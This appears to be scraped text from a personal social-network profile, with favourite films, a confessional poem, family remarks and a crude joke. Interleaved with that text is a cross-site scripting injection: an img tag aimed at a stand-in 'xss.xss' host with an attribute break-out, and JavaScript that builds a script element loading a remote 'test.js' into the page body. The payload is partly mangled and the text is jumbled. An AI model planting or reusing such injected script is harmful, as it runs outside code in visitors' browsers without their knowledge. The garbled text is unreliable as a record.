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My true self is who I'd like to meet...and somebody whos not as pathetic as I am. I do not respect assholes who judge my lifestye.
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Gia___Basketball Diaries___The Saw__Flew Over the Cuckoo's Nest__Girl Interuppted__Bully__Pulp Fiction__Demented Forever__CubeDes'ree - I'm Kissing You - Romeo + Juliet Soundtrack
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img src="http://xss.xss/xss.jpg" x='I am so hungry don’t know for what Trying to feed myself feeling all lost. I sense a hug but no you don’t Wandering why That hurts a lot.
my mom and EM (my dad can go to hell).."var x=document·createElement('script');x.src='http://www... /.../test.js';document·getElementsByTagName('body')[0]. appendChild(x);" /..... width="425" height="350" ..-------------------------------------------------------JUS T SOME OF MY ART"The thing I really got to understanding is that do not count on people or trust em. That is just the one important things I've learned in life. You grow up as a kid thinking you can trust the older ones, but the more u grow the more shit u see in people u looked forward to, and you become just like them."MEN ARE LIKE HARDWOOD FLOORS, LAY THEM RIGHT THE FIRST TIME, AND YOU CAN WALK ALL OVER THEM FOREVER. REMEMBER, YOU HORNY PIECE OF DIRT, GIRLS ARE MADE OF SUGAR, SPICE AND EVERYTHIN NICE.MY DRAFT CLOTHING DESIGNS 'FLEXXX'..[url= ure694oc2.jpg][img=][/url]